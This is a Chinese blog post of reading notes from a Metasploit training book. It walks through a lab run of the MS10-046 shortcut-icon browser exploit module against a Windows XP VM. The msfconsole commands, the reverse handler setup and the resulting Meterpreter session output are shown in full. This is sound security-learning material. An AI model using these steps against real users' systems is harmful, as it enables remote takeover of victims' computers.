cstriker1407的笔记本

好记性不如铅笔头

安全, 操作系统

某《魔鬼训练营》读书笔记:metasploit渗透浏览器

!!!笔记仅供学习交流使用,请勿进行其他用途!!!

Metasploit自带了很多浏览器攻击模块,这里笔记下最简单的使用方式。

root@kali:~# msfconsole
。。。。。。
。。。。。。
msf > search browser #搜索可用模块


Matching Modules
================


   Name                                                                   Disclosure Date          Rank       Description
   ----                                                                   ---------------          ----       -----------
。。。。。。
。。。。。。
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader #这里使用一个比较新的渗透攻击模块
msf exploit(ms10_046_shortcut_icon_dllloader) > show options


Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):


   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).




Exploit target:


   Id  Name
   --  ----
   0   Automatic




msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.


[*] Started reverse handler on 192.168.19.128:4444 
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\192.168.19.128\qKJqXZCIry\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.19.128:80/

# 当别人通过浏览器访问【 http://192.168.19.128:80/ 】时,就会触发漏洞,启动一个meterperter,如下:

。。。。。。
。。。。。。
[*] Meterpreter session 1 opened (192.168.19.128:4444 -> 192.168.19.129:1106) at 2014-06-04 20:56:32 +0800

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions

Active sessions
===============


  Id  Type                   Information                                Connection
  --  ----                   -----------                                ----------
  1   meterpreter x86/win32  WINXP-PRO-VM\Administrator @ WINXP-PRO-VM  192.168.19.128:4444 -> 192.168.19.129:1106 (192.168.19.129)


msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WINXP-PRO-VM
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > 

 

Leave a Reply

3 + 4 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

Theme by Anders Norén

苏ICP备16032087号